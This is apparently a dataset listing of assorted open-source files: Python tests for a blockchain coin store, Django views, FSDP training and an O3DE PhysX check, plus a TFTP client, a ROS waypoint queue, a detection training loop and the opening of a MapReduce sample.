filename
stringlengths 13
19
| text
stringlengths 134
1.04M
|
---|---|
the-stack_0_19769 | import asyncio
import logging
from pathlib import Path
from typing import List, Optional, Set, Tuple
import aiosqlite
import pytest
from aloe.consensus.block_rewards import calculate_base_farmer_reward, calculate_pool_reward
from aloe.consensus.blockchain import Blockchain, ReceiveBlockResult
from aloe.consensus.coinbase import create_farmer_coin, create_pool_coin
from aloe.full_node.block_store import BlockStore
from aloe.full_node.coin_store import CoinStore
from aloe.full_node.mempool_check_conditions import get_name_puzzle_conditions
from aloe.types.blockchain_format.coin import Coin
from aloe.types.coin_record import CoinRecord
from aloe.types.full_block import FullBlock
from aloe.types.generator_types import BlockGenerator
from aloe.util.generator_tools import tx_removals_and_additions
from aloe.util.ints import uint64, uint32
from aloe.util.wallet_tools import WalletTool
from aloe.util.db_wrapper import DBWrapper
from tests.setup_nodes import bt, test_constants
@pytest.fixture(scope="module")
def event_loop():
loop = asyncio.get_event_loop()
yield loop
constants = test_constants
WALLET_A = WalletTool(constants)
log = logging.getLogger(__name__)
def get_future_reward_coins(block: FullBlock) -> Tuple[Coin, Coin]:
pool_amount = calculate_pool_reward(block.height)
farmer_amount = calculate_base_farmer_reward(block.height)
if block.is_transaction_block():
assert block.transactions_info is not None
farmer_amount = uint64(farmer_amount + block.transactions_info.fees)
pool_coin: Coin = create_pool_coin(
block.height, block.foliage.foliage_block_data.pool_target.puzzle_hash, pool_amount, constants.GENESIS_CHALLENGE
)
farmer_coin: Coin = create_farmer_coin(
block.height,
block.foliage.foliage_block_data.farmer_reward_puzzle_hash,
farmer_amount,
constants.GENESIS_CHALLENGE,
)
return pool_coin, farmer_coin
class TestCoinStore:
@pytest.mark.asyncio
async def test_basic_coin_store(self):
wallet_a = WALLET_A
reward_ph = wallet_a.get_new_puzzlehash()
for cache_size in [0]:
# Generate some coins
blocks = bt.get_consecutive_blocks(
10,
[],
farmer_reward_puzzle_hash=reward_ph,
pool_reward_puzzle_hash=reward_ph,
)
coins_to_spend: List[Coin] = []
for block in blocks:
if block.is_transaction_block():
for coin in block.get_included_reward_coins():
if coin.puzzle_hash == reward_ph:
coins_to_spend.append(coin)
spend_bundle = wallet_a.generate_signed_transaction(1000, wallet_a.get_new_puzzlehash(), coins_to_spend[0])
db_path = Path("fndb_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
db_wrapper = DBWrapper(connection)
coin_store = await CoinStore.create(db_wrapper, cache_size=uint32(cache_size))
blocks = bt.get_consecutive_blocks(
10,
blocks,
farmer_reward_puzzle_hash=reward_ph,
pool_reward_puzzle_hash=reward_ph,
transaction_data=spend_bundle,
)
# Adding blocks to the coin store
should_be_included_prev: Set[Coin] = set()
should_be_included: Set[Coin] = set()
for block in blocks:
farmer_coin, pool_coin = get_future_reward_coins(block)
should_be_included.add(farmer_coin)
should_be_included.add(pool_coin)
if block.is_transaction_block():
if block.transactions_generator is not None:
block_gen: BlockGenerator = BlockGenerator(block.transactions_generator, [])
npc_result = get_name_puzzle_conditions(block_gen, bt.constants.MAX_BLOCK_COST_CLVM, False)
tx_removals, tx_additions = tx_removals_and_additions(npc_result.npc_list)
else:
tx_removals, tx_additions = [], []
assert block.get_included_reward_coins() == should_be_included_prev
await coin_store.new_block(block, tx_additions, tx_removals)
if block.height != 0:
with pytest.raises(Exception):
await coin_store.new_block(block, tx_additions, tx_removals)
for expected_coin in should_be_included_prev:
# Check that the coinbase rewards are added
record = await coin_store.get_coin_record(expected_coin.name())
assert record is not None
assert not record.spent
assert record.coin == expected_coin
for coin_name in tx_removals:
# Check that the removed coins are set to spent
record = await coin_store.get_coin_record(coin_name)
assert record.spent
for coin in tx_additions:
# Check that the added coins are added
record = await coin_store.get_coin_record(coin.name())
assert not record.spent
assert coin == record.coin
should_be_included_prev = should_be_included.copy()
should_be_included = set()
await connection.close()
Path("fndb_test.db").unlink()
@pytest.mark.asyncio
async def test_set_spent(self):
blocks = bt.get_consecutive_blocks(9, [])
for cache_size in [0, 10, 100000]:
db_path = Path("fndb_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
db_wrapper = DBWrapper(connection)
coin_store = await CoinStore.create(db_wrapper, cache_size=uint32(cache_size))
# Save/get block
for block in blocks:
if block.is_transaction_block():
removals, additions = [], []
await coin_store.new_block(block, additions, removals)
coins = block.get_included_reward_coins()
records = [await coin_store.get_coin_record(coin.name()) for coin in coins]
for record in records:
await coin_store._set_spent(record.coin.name(), block.height)
with pytest.raises(AssertionError):
await coin_store._set_spent(record.coin.name(), block.height)
records = [await coin_store.get_coin_record(coin.name()) for coin in coins]
for record in records:
assert record.spent
assert record.spent_block_index == block.height
await connection.close()
Path("fndb_test.db").unlink()
@pytest.mark.asyncio
async def test_rollback(self):
blocks = bt.get_consecutive_blocks(20)
for cache_size in [0, 10, 100000]:
db_path = Path("fndb_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
db_wrapper = DBWrapper(connection)
coin_store = await CoinStore.create(db_wrapper, cache_size=uint32(cache_size))
for block in blocks:
if block.is_transaction_block():
removals, additions = [], []
await coin_store.new_block(block, additions, removals)
coins = block.get_included_reward_coins()
records: List[Optional[CoinRecord]] = [
await coin_store.get_coin_record(coin.name()) for coin in coins
]
for record in records:
await coin_store._set_spent(record.coin.name(), block.height)
records: List[Optional[CoinRecord]] = [
await coin_store.get_coin_record(coin.name()) for coin in coins
]
for record in records:
assert record.spent
assert record.spent_block_index == block.height
reorg_index = 8
await coin_store.rollback_to_block(reorg_index)
for block in blocks:
if block.is_transaction_block():
coins = block.get_included_reward_coins()
records: List[Optional[CoinRecord]] = [
await coin_store.get_coin_record(coin.name()) for coin in coins
]
if block.height <= reorg_index:
for record in records:
assert record is not None
assert record.spent
else:
for record in records:
assert record is None
await connection.close()
Path("fndb_test.db").unlink()
@pytest.mark.asyncio
async def test_basic_reorg(self):
for cache_size in [0, 10, 100000]:
initial_block_count = 30
reorg_length = 15
blocks = bt.get_consecutive_blocks(initial_block_count)
db_path = Path("blockchain_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
db_wrapper = DBWrapper(connection)
coin_store = await CoinStore.create(db_wrapper, cache_size=uint32(cache_size))
store = await BlockStore.create(db_wrapper)
b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
try:
for block in blocks:
await b.receive_block(block)
assert b.get_peak().height == initial_block_count - 1
for c, block in enumerate(blocks):
if block.is_transaction_block():
coins = block.get_included_reward_coins()
records: List[Optional[CoinRecord]] = [
await coin_store.get_coin_record(coin.name()) for coin in coins
]
for record in records:
assert not record.spent
assert record.confirmed_block_index == block.height
assert record.spent_block_index == 0
blocks_reorg_chain = bt.get_consecutive_blocks(
reorg_length, blocks[: initial_block_count - 10], seed=b"2"
)
for reorg_block in blocks_reorg_chain:
result, error_code, _ = await b.receive_block(reorg_block)
print(f"Height {reorg_block.height} {initial_block_count - 10} result {result}")
if reorg_block.height < initial_block_count - 10:
assert result == ReceiveBlockResult.ALREADY_HAVE_BLOCK
elif reorg_block.height < initial_block_count - 1:
assert result == ReceiveBlockResult.ADDED_AS_ORPHAN
elif reorg_block.height >= initial_block_count:
assert result == ReceiveBlockResult.NEW_PEAK
if reorg_block.is_transaction_block():
coins = reorg_block.get_included_reward_coins()
records: List[Optional[CoinRecord]] = [
await coin_store.get_coin_record(coin.name()) for coin in coins
]
for record in records:
assert not record.spent
assert record.confirmed_block_index == reorg_block.height
assert record.spent_block_index == 0
assert error_code is None
assert b.get_peak().height == initial_block_count - 10 + reorg_length - 1
except Exception as e:
await connection.close()
Path("blockchain_test.db").unlink()
b.shut_down()
raise e
await connection.close()
Path("blockchain_test.db").unlink()
b.shut_down()
@pytest.mark.asyncio
async def test_get_puzzle_hash(self):
for cache_size in [0, 10, 100000]:
num_blocks = 20
farmer_ph = 32 * b"0"
pool_ph = 32 * b"1"
blocks = bt.get_consecutive_blocks(
num_blocks,
farmer_reward_puzzle_hash=farmer_ph,
pool_reward_puzzle_hash=pool_ph,
guarantee_transaction_block=True,
)
db_path = Path("blockchain_test.db")
if db_path.exists():
db_path.unlink()
connection = await aiosqlite.connect(db_path)
db_wrapper = DBWrapper(connection)
coin_store = await CoinStore.create(db_wrapper, cache_size=uint32(cache_size))
store = await BlockStore.create(db_wrapper)
b: Blockchain = await Blockchain.create(coin_store, store, test_constants)
for block in blocks:
res, err, _ = await b.receive_block(block)
assert err is None
assert res == ReceiveBlockResult.NEW_PEAK
assert b.get_peak().height == num_blocks - 1
coins_farmer = await coin_store.get_coin_records_by_puzzle_hash(True, pool_ph)
coins_pool = await coin_store.get_coin_records_by_puzzle_hash(True, farmer_ph)
assert len(coins_farmer) == num_blocks - 2
assert len(coins_pool) == num_blocks - 2
await connection.close()
Path("blockchain_test.db").unlink()
b.shut_down()
|
the-stack_0_19770 | import pytest
from django.conf import settings
from django.contrib import messages
from django.contrib.auth.models import AnonymousUser
from django.contrib.messages.middleware import MessageMiddleware
from django.contrib.sessions.middleware import SessionMiddleware
from django.http import HttpRequest
from django.test import RequestFactory
from django.urls import reverse
from pedagogy_manager.users.forms import UserChangeForm
from pedagogy_manager.users.models import User
from pedagogy_manager.users.tests.factories import UserFactory
from pedagogy_manager.users.views import (
UserRedirectView,
UserUpdateView,
user_detail_view,
)
pytestmark = pytest.mark.django_db
class TestUserUpdateView:
"""
TODO:
extracting view initialization code as class-scoped fixture
would be great if only pytest-django supported non-function-scoped
fixture db access -- this is a work-in-progress for now:
https://github.com/pytest-dev/pytest-django/pull/258
"""
def dummy_get_response(self, request: HttpRequest):
return None
def test_get_success_url(self, user: User, rf: RequestFactory):
view = UserUpdateView()
request = rf.get("/fake-url/")
request.user = user
view.request = request
assert view.get_success_url() == f"/users/{user.username}/"
def test_get_object(self, user: User, rf: RequestFactory):
view = UserUpdateView()
request = rf.get("/fake-url/")
request.user = user
view.request = request
assert view.get_object() == user
def test_form_valid(self, user: User, rf: RequestFactory):
view = UserUpdateView()
request = rf.get("/fake-url/")
# Add the session/message middleware to the request
SessionMiddleware(self.dummy_get_response).process_request(request)
MessageMiddleware(self.dummy_get_response).process_request(request)
request.user = user
view.request = request
# Initialize the form
form = UserChangeForm()
form.cleaned_data = []
view.form_valid(form)
messages_sent = [m.message for m in messages.get_messages(request)]
assert messages_sent == ["Information successfully updated"]
class TestUserRedirectView:
def test_get_redirect_url(self, user: User, rf: RequestFactory):
view = UserRedirectView()
request = rf.get("/fake-url")
request.user = user
view.request = request
assert view.get_redirect_url() == f"/users/{user.username}/"
class TestUserDetailView:
def test_authenticated(self, user: User, rf: RequestFactory):
request = rf.get("/fake-url/")
request.user = UserFactory()
response = user_detail_view(request, username=user.username)
assert response.status_code == 200
def test_not_authenticated(self, user: User, rf: RequestFactory):
request = rf.get("/fake-url/")
request.user = AnonymousUser()
response = user_detail_view(request, username=user.username)
login_url = reverse(settings.LOGIN_URL)
assert response.status_code == 302
assert response.url == f"{login_url}?next=/fake-url/"
|
the-stack_0_19772 | import os
from os import PathLike
from typing import Union, Dict, Optional
import torch
from torch.cuda import amp
from torch.testing import assert_allclose
import pytest
from allennlp.common.testing import AllenNlpTestCase, run_distributed_test, requires_multi_gpu
from allennlp.nn.util import load_state_dict_distributed
from allennlp.nn.parallel import (
FairScaleFsdpAccelerator,
FairScaleFsdpWrappedModel,
ShardedModuleMixin,
)
class EncoderDecoderModel(torch.nn.Module):
"""
Simple model to use for testing. We use an encoder-decoder architecture with tied
embeddings to make sure we cover enough edge cases.
"""
def __init__(self, fsdp_wrapper: FairScaleFsdpAccelerator) -> None:
super().__init__()
self.embedding = torch.nn.Embedding(12, 4)
self.emb_proj = fsdp_wrapper.wrap_module(torch.nn.Linear(4, 4))
self.encoder = fsdp_wrapper.wrap_module(Encoder())
self.decoder = Decoder(self.embedding, fsdp_wrapper)
# Add a buffer to make sure these are handled correctly. We don't actually
# do anything with this though.
self.register_buffer("buffer", torch.randn(4, 4))
def tie_weights(self):
"""
Should be called after loading state dict to make sure embedding weigths are tied.
"""
self.decoder.linear.weight = self.embedding.weight
def forward(self, x):
x = self.embedding(x)
x = self.emb_proj(x)
x = self.encoder(x)
x = self.decoder(x)
return x
class Encoder(torch.nn.Module):
def __init__(self) -> None:
super().__init__()
self.ff1 = FeedForward()
self.ff2 = FeedForward()
# Add a buffer to make sure these are handled correctly. We don't actually
# do anything with this though.
self.register_buffer("buffer", torch.randn(4, 4))
def forward(self, x):
return self.ff2(self.ff1(x))
class Decoder(torch.nn.Module):
def __init__(
self, embedding: torch.nn.Embedding, fsdp_wrapper: FairScaleFsdpAccelerator
) -> None:
super().__init__()
self.ff = fsdp_wrapper.wrap_module(FeedForward())
# Don't want to wrap this linear layer since we are tying the weights to the embedding.
self.linear = torch.nn.Linear(4, 12, bias=False)
self.linear.weight = embedding.weight
# Add a buffer to make sure these are handled correctly. We don't actually
# do anything with this though.
self.register_buffer("buffer", torch.randn(4, 4))
def forward(self, x):
return self.linear(self.ff(x))
class FeedForward(torch.nn.Module):
def __init__(self) -> None:
super().__init__()
self.linear = torch.nn.Linear(4, 4)
self.activation = torch.nn.ReLU()
def forward(self, x):
return self.activation(self.linear(x))
def _dist_load_and_train(
global_rank: int,
world_size: int,
gpu_id: int,
test_dir: Union[str, PathLike],
mixed_precision: bool,
**kwargs,
):
# make sure everything is deterministic.
torch.manual_seed(global_rank)
fsdp_wrapper = FairScaleFsdpAccelerator(
local_rank=global_rank,
world_size=world_size,
cuda_device=gpu_id,
mixed_precision=mixed_precision,
**kwargs,
)
model = EncoderDecoderModel(fsdp_wrapper)
state_dict: Optional[Dict[str, torch.Tensor]] = None
if global_rank == 0:
embedding_weight = torch.randn(12, 4)
state_dict = {
"embedding.weight": embedding_weight,
"emb_proj.weight": torch.randn(4, 4),
"emb_proj.bias": torch.randn(4),
"encoder.ff1.linear.weight": torch.randn(4, 4),
"encoder.ff1.linear.bias": torch.randn(4),
"encoder.ff2.linear.weight": torch.randn(4, 4),
"encoder.ff2.linear.bias": torch.randn(4),
"encoder.buffer": torch.randn(4, 4),
"decoder.ff.linear.weight": torch.randn(4, 4),
"decoder.ff.linear.bias": torch.randn(4),
"decoder.linear.weight": embedding_weight,
"decoder.buffer": torch.randn(4, 4),
"buffer": torch.randn(4, 4),
}
torch.save(state_dict, os.path.join(test_dir, "state.pt"))
# Make sure the right modules are sharded.
assert not isinstance(model.embedding, ShardedModuleMixin)
assert isinstance(model.encoder, ShardedModuleMixin)
assert isinstance(model.decoder.ff, ShardedModuleMixin)
# Now load the state dict... we should be able to do this before wrapping the model itself
# with the fsdp_wrapper.
missing_keys, unexpected_keys = load_state_dict_distributed(model, state_dict)
assert not missing_keys
assert not unexpected_keys
# Make sure weights are still tied.
model.tie_weights()
# Now wrap outer model.
model, wrapped_model = fsdp_wrapper.wrap_model(model)
# TODO: grad scaler doesn't work now due to https://github.com/facebookresearch/fairscale/issues/421.
# scaler = wrapped_model.init_grad_scaler()
scaler: Optional[amp.GradScaler] = None
# Checkpoint each worker's state.
worker_state = wrapped_model.state_dict()
for name, value in worker_state["weights"].items():
# Each tensor should be on the current device if mixed_precision is `False`,
# otherwise they will be on CPU (since we set `move_params_to_cpu`).
if mixed_precision:
assert value.device == torch.device("cpu")
else:
assert value.device == torch.device(gpu_id)
# Either way, tensors returned should be full precision.
assert value.dtype == torch.float, f"{name} is {value.dtype}"
# Save state dict from each worker.
torch.save(worker_state, os.path.join(test_dir, f"state_worker{gpu_id}.pt"))
# Now we'll make sure we can successfully do a forward pass, backward pass, and optimizer step.
optim = torch.optim.Adam(wrapped_model.model.parameters(), lr=0.0001)
x = torch.randint(12, (2, 6)).to(torch.device(gpu_id))
# Do a forward pass.
with amp.autocast(enabled=mixed_precision):
x = wrapped_model.model(x)
loss = x.sum()
# And a backwards pass + optimizer step.
if scaler is not None:
scaler.scale(loss).backward()
scaler.step(optim)
scaler.update()
else:
loss.backward()
optim.step()
# Now save final state.
torch.save(wrapped_model.state_dict(), os.path.join(test_dir, f"final_state_worker{gpu_id}.pt"))
class TestFairScaleFsdpAccelerator(AllenNlpTestCase):
@pytest.mark.parametrize(
"mixed_precision",
(True, False),
ids=lambda val: f"amp={val}",
)
@pytest.mark.parametrize(
"flatten_parameters",
(True, False),
ids=lambda val: f"flatten={val}",
)
@requires_multi_gpu
def test_distributed_loading_and_training(self, mixed_precision, flatten_parameters):
run_distributed_test(
[0, 1],
func=_dist_load_and_train,
test_dir=self.TEST_DIR,
mixed_precision=mixed_precision,
flatten_parameters=flatten_parameters,
)
# Now make sure the sharded saved state is exactly the same as the original state when consolidated.
original_state = torch.load(self.TEST_DIR / "state.pt", map_location="cpu")
consolidated_state = FairScaleFsdpWrappedModel.consolidate_sharded_state(
[
self.TEST_DIR / "state_worker0.pt",
self.TEST_DIR / "state_worker1.pt",
]
)
assert set(original_state.keys()) - set(consolidated_state.keys()) == {
"decoder.linear.weight" # won't be in the state dict since param is tied to embedding.weight
}
for key, tensor0 in original_state.items():
if key not in consolidated_state:
continue
# Need to give extra tolerance for buffers when `mixed_precision` is `True`.
tolerance = None if not mixed_precision or "buffer" not in key else 1e-3
tensor1 = consolidated_state[key]
assert_allclose(
tensor0,
tensor1,
msg=f"{key} is off in consolidated state.\nExpected:\n{tensor0}\nGot:\n{tensor1}",
atol=tolerance,
rtol=tolerance,
)
|
the-stack_0_19773 | """
Copyright (c) Contributors to the Open 3D Engine Project.
For complete copyright and license terms please see the LICENSE at the root of this distribution.
SPDX-License-Identifier: Apache-2.0 OR MIT
Test case ID : C14861504
Test Case Title : Verify if Rendering Mesh does not have a PhysX Collision Mesh fbx, then PxMesh is not auto-assigned
"""
# fmt: off
class Tests():
create_entity = ("Created test entity", "Failed to create test entity")
mesh_added = ("Added Mesh component", "Failed to add Mesh component")
physx_collider_added = ("Added PhysX Collider component", "Failed to add PhysX Collider component")
assign_mesh_asset = ("Assigned Mesh asset to Mesh component", "Failed to assign mesh asset to Mesh component")
shape_not_assigned = ("Shape is not auto assigned", "Shape auto assigned unexpectedly")
enter_game_mode = ("Entered game mode", "Failed to enter game mode")
warnings_found = ("Warnings found in logs", "No warnings found in logs")
# fmt: on
def C14861504_RenderMeshAsset_WithNoPxAsset():
"""
Summary:
Create entity with Mesh component and assign a render mesh that has no physics asset to the Mesh component.
Add Physics Collider component and Verify that the physics mesh asset is not auto-assigned.
Expected Behavior:
Following warning is logged in Game mode:
"(PhysX) - EditorColliderComponent::BuildGameEntity. No asset assigned to Collider Component. Entity: <Entity Name>"
Test Steps:
1) Load the empty level
2) Create an entity
3) Add Mesh component
4) Assign a render mesh asset to Mesh component (the fbx mesh having only Static mesh and no PxMesh)
5) Add PhysX Collider component
6) The physics asset in PhysX Collider component is not auto-assigned.
7) Enter GameMode and check for warnings
Note:
- This test file must be called from the Open 3D Engine Editor command terminal
- Any passed and failed tests are written to the Editor.log file.
Parsing the file or running a log_monitor are required to observe the test results.
:return: None
"""
# Builtins
import os
# Helper Files
from editor_python_test_tools.editor_entity_utils import EditorEntity as Entity
from editor_python_test_tools.utils import Report
from editor_python_test_tools.utils import TestHelper as helper
from editor_python_test_tools.utils import Tracer
from editor_python_test_tools.asset_utils import Asset
# Open 3D Engine Imports
import azlmbr.asset as azasset
# Asset paths
STATIC_MESH = os.path.join("assets", "c14861504_rendermeshasset_withnopxasset", "test_asset.azmodel")
helper.init_idle()
# 1) Load the empty level
helper.open_level("Physics", "Base")
# 2) Create an entity
test_entity = Entity.create_editor_entity("test_entity")
Report.result(Tests.create_entity, test_entity.id.IsValid())
# 3) Add Mesh component
mesh_component = test_entity.add_component("Mesh")
Report.result(Tests.mesh_added, test_entity.has_component("Mesh"))
# 4) Assign a render mesh asset to Mesh component (the fbx mesh having both Static mesh and PhysX collision Mesh)
mesh_asset = Asset.find_asset_by_path(STATIC_MESH)
mesh_component.set_component_property_value("Controller|Configuration|Mesh Asset", mesh_asset.id)
mesh_asset.id = mesh_component.get_component_property_value("Controller|Configuration|Mesh Asset")
Report.result(Tests.assign_mesh_asset, mesh_asset.get_path() == STATIC_MESH.replace(os.sep, "/"))
# 5) Add PhysX Collider component
test_component = test_entity.add_component("PhysX Collider")
Report.result(Tests.physx_collider_added, test_entity.has_component("PhysX Collider"))
# 6) The physics asset in PhysX Collider component is not auto-assigned.
asset_id = test_component.get_component_property_value("Shape Configuration|Asset|PhysX Mesh")
# Comparing asset_id with Null/Invalid asset azlmbr.asset.AssetId() to check that asset is not auto assigned
Report.result(Tests.shape_not_assigned, asset_id == azasset.AssetId())
# 7) Enter GameMode and check for warnings
with Tracer() as section_tracer:
helper.enter_game_mode(Tests.enter_game_mode)
# Checking if warning exist and the exact warning is caught in the expected lines in Test file
Report.result(Tests.warnings_found, section_tracer.has_warnings)
if __name__ == "__main__":
from editor_python_test_tools.utils import Report
Report.start_test(C14861504_RenderMeshAsset_WithNoPxAsset)
|
the-stack_0_19776 | import socket
import os
import struct
def put(client, filename, addr):
#file_path = os.path.abspath(filename)
try:
open_file = open(filename, 'rb')
except FileNotFoundError:
print(filename + " can not open. Maybe file not exist")
return
title = b'\x00\x02' + filename.encode()+b'\x00'+"octet".encode()+b'\x00'
client.sendto(title, addr)
block = 0
while True:
data, sock = client.recvfrom(65536)
req = data[0:2]
if req == b'\x00\x04':
curr_block = struct.unpack('!H', data[2:4])[0]
if curr_block != block:
continue
curr_block += 1
if curr_block == 65536:
curr_block = 0
read_data = open_file.read(512)
curr_pack = b'\x00\x03'+struct.pack(b'!H', curr_block)+read_data
client.sendto(curr_pack, addr)
block += 1
if block == 65536:
block = 0
if len(read_data) < 512:
open_file.close()
print("Done")
break
elif req == b'\x00\x05':
print(data)
break
def get(client, filename, addr):
file_path = os.path.abspath("server_"+filename)
if os.path.isfile(file_path):
file_path = os.path.abspath(change_filename(filename))
curr_pack = b'\x00\x01'+filename.encode()+b'\x00'+'octet'.encode()+b'\x00'
client.sendto(curr_pack, addr)
create_file = open(file_path, 'wb')
block = 1
while True:
try:
data, sock = client.recvfrom(65536)
req = data[0:2]
except socket.timeout:
client.sendto(curr_pack, addr)
print("Timeout")
create_file.close()
os.remove(create_file.name)
break
if req == b'\x00\x03':
curr_block = struct.unpack('!H', data[2:4])[0]
read_data = data[4:]
if curr_block != block:
continue
block += 1
if block == 65536:
block = 1
create_file.write(read_data)
curr_pack = b'\x00\x04'+struct.pack(b'!H', curr_block)
client.sendto(curr_pack, addr)
if len(read_data) < 512:
print("Done")
create_file.close()
break
elif req == b'\x00\x05':
print(data)
create_file.close()
os.remove(file_path)
break
def change_filename(filename):
n = 1
file = str(n) + '_server_' + filename
while True:
if os.path.isfile(file):
n += 1
file = str(n) + '_server_' + filename
else:
break
return file
def main():
SERVER = "127.0.0.1"
PORT = 69
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
while True:
inp_req = input("Enter command: ")
req = str(inp_req).lower().split()
if len(req) == 1:
if req[0] == "--help":
print("Enter get filename to download or put filename to upload")
else:
print("Wrong command. Try again")
elif len(req) == 2:
if req[0] == "get":
get(client, req[1], (SERVER, PORT))
elif req[0] == "put":
put(client, req[1], (SERVER, PORT))
else:
print("Wrong command. Try again")
else:
print("Wrong command. Try again")
if __name__ == '__main__':
main() |
the-stack_0_19778 | #!/usr/bin/env python
import rospy
from MoveAction import MoveAction
from geometry_msgs.msg import PoseStamped
#--- "TMA WatPoints" for delivery at many places using Queue to store and control plan by priority [First In, First Out]
class WayPoints:
#--- Initialize the Queue for storing the list of points to delivery -----------------------------------------------
def __init__(self):
self.plan = list()
self.currentMoveId = ""
#--- The function to take elements of the queue and control the robot to delivery ----------------------------------
def delivery(self):
n = 0 #--- Declare the n to count num of element that was delivery ---------------------------
while not self.isEmpty():
#--- pick the first element of the queue -------------------------------------------------------------------
self.currentMoveAction = self.poll()
self.currentMoveId = self.currentMoveAction.moveId
#-----------------------------------------------------------------------------------------------------------
self.allMoveId()
#--- let the robot move to target --------------------------------------------------------------------------
result = self.currentMoveAction.move_to_goal()
n += 1
if result:
rospy.loginfo("------ Goal reached the number %s ------\n", (n+1))
#--- The function put one element to the right of queue :: ------------------------------------------------------
def add(self, element):
self.plan.append(element)
self.allMoveId()
#--- This method removes and returns the head of the queue. It returns null if the queue is empty. -----------------
def poll(self):
result = None
if self.size() > 0:
result = self.plan[0]
del self.plan[0]
return result
#--- The function cancel an element of queue by id -----------------------------------------------------------------
def cancel(self, elementId):
#--- The cancel action is the current move -> we cancel this ---------------------------------------------------
tb = "\n#####----- Want to delete ["+elementId.data+"] Current ID ["+self.currentMoveId+"] -----#####\n"
if (self.currentMoveId == elementId.data):
self.currentMoveAction.cancel()
else:
x = self.getElementById(elementId) #--- Find the MoveAction by Id in the plan ---------------------
if x is not None:
self.plan.remove(x) #--- Remove this action from the plan --------------------------
rospy.loginfo(tb + "#####-----------------------------------------------------------#####\n")
self.allMoveId()
#--- Dispaly all MoveId in the way points --------------------------------------------------------------------------
def allMoveId(self):
s = "All of MoveId in plan \n ------- " if self.size()>0 else "The delivery plan is empty"
for i in self.plan:
s = s + "[" + i.moveId + "] "
rospy.loginfo(s+"------- \n")
#--- Return an element by ID, null if not exist in this plan -------------------------------------------------------
def getElementById(self, elementId):
result = None
for x in self.plan:
if (x.moveId == elementId.data):
result = x
break
return result
#--- The method used to check the MoveAction already exists in the delivery plan or not ----------------------------
def isExist(self, x):
result = False
for i in self.plan:
result = (i.moveId == x.moveId)
if result:
break;
return result
#--- Return if the queue is empty ----------------------------------------------------------------------------------
def isEmpty(self):
return (self.size() == 0)
#--- Return size of the plan queue ---------------------------------------------------------------------------------
def size(self):
return len(self.plan)
|
the-stack_0_19783 | import math
import sys
import time
import torch
import torchvision.models.detection.mask_rcnn
import utils
from coco_eval import CocoEvaluator
from coco_utils import get_coco_api_from_dataset
def train_one_epoch(model, optimizer, data_loader, device, epoch, print_freq, scaler=None):
model.train()
metric_logger = utils.MetricLogger(delimiter=" ")
metric_logger.add_meter("lr", utils.SmoothedValue(window_size=1, fmt="{value:.6f}"))
header = f"Epoch: [{epoch}]"
lr_scheduler = None
if epoch == 0:
warmup_factor = 1.0 / 1000
warmup_iters = min(1000, len(data_loader) - 1)
lr_scheduler = torch.optim.lr_scheduler.LinearLR(
optimizer, start_factor=warmup_factor, total_iters=warmup_iters
)
for images, targets in metric_logger.log_every(data_loader, print_freq, header):
try:
images = list(image.to(device) for image in images)
targets = [{k: v.to(device) for k, v in t.items()} for t in targets]
with torch.cuda.amp.autocast(enabled=scaler is not None):
loss_dict = model(images, targets)
losses = sum(loss for loss in loss_dict.values())
# reduce losses over all GPUs for logging purposes
loss_dict_reduced = utils.reduce_dict(loss_dict)
losses_reduced = sum(loss for loss in loss_dict_reduced.values())
loss_value = losses_reduced.item()
if not math.isfinite(loss_value):
print(f"Loss is {loss_value}, stopping training")
print(loss_dict_reduced)
sys.exit(1)
except Exception as exp:
print("ERROR", str(exp))
torch.save({'img': images, 'targets': targets}, 'error_causing_batch.pth')
raise RuntimeError
optimizer.zero_grad()
if scaler is not None:
scaler.scale(losses).backward()
scaler.step(optimizer)
scaler.update()
else:
losses.backward()
optimizer.step()
if lr_scheduler is not None:
lr_scheduler.step()
metric_logger.update(loss=losses_reduced, **loss_dict_reduced)
metric_logger.update(lr=optimizer.param_groups[0]["lr"])
return metric_logger
def _get_iou_types(model):
model_without_ddp = model
if isinstance(model, torch.nn.parallel.DistributedDataParallel):
model_without_ddp = model.module
iou_types = ["bbox"]
if isinstance(model_without_ddp, torchvision.models.detection.MaskRCNN):
iou_types.append("segm")
if isinstance(model_without_ddp, torchvision.models.detection.KeypointRCNN):
iou_types.append("keypoints")
return iou_types
@torch.inference_mode()
def evaluate(model, data_loader, device, iou_types=None):
n_threads = torch.get_num_threads()
# FIXME remove this and make paste_masks_in_image run on the GPU
torch.set_num_threads(1)
cpu_device = torch.device("cpu")
model.eval()
metric_logger = utils.MetricLogger(delimiter=" ")
header = "Test:"
coco = get_coco_api_from_dataset(data_loader.dataset)
if iou_types is None:
iou_types = _get_iou_types(model)
coco_evaluator = CocoEvaluator(coco, iou_types)
for images, targets in metric_logger.log_every(data_loader, 100, header):
images = list(img.to(device) for img in images)
if torch.cuda.is_available():
torch.cuda.synchronize()
model_time = time.time()
outputs = model(images)
outputs = [{k: v.to(cpu_device) for k, v in t.items()} for t in outputs]
model_time = time.time() - model_time
res = {target["image_id"].item(): output for target, output in zip(targets, outputs)}
evaluator_time = time.time()
coco_evaluator.update(res)
evaluator_time = time.time() - evaluator_time
metric_logger.update(model_time=model_time, evaluator_time=evaluator_time)
# gather the stats from all processes
metric_logger.synchronize_between_processes()
print("Averaged stats:", metric_logger)
coco_evaluator.synchronize_between_processes()
# accumulate predictions from all images
coco_evaluator.accumulate()
coco_evaluator.summarize()
torch.set_num_threads(n_threads)
return coco_evaluator
|
the-stack_0_19785 | #!/usr/bin/env python
#
# Copyright 2011 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" This is a sample application that tests the MapReduce API.
It does so by allowing users to upload a zip file containing plaintext files
and perform some kind of analysis upon it. Currently three types of MapReduce
jobs can be run over user-supplied input data: a WordCount MR that reports the
number of occurrences of each word, an Index MR that reports which file(s) each
word in the input corpus comes from, and a Phrase MR that finds statistically
improbably phrases for a given input file (this requires many input files in the
zip file to attain higher accuracies)."""
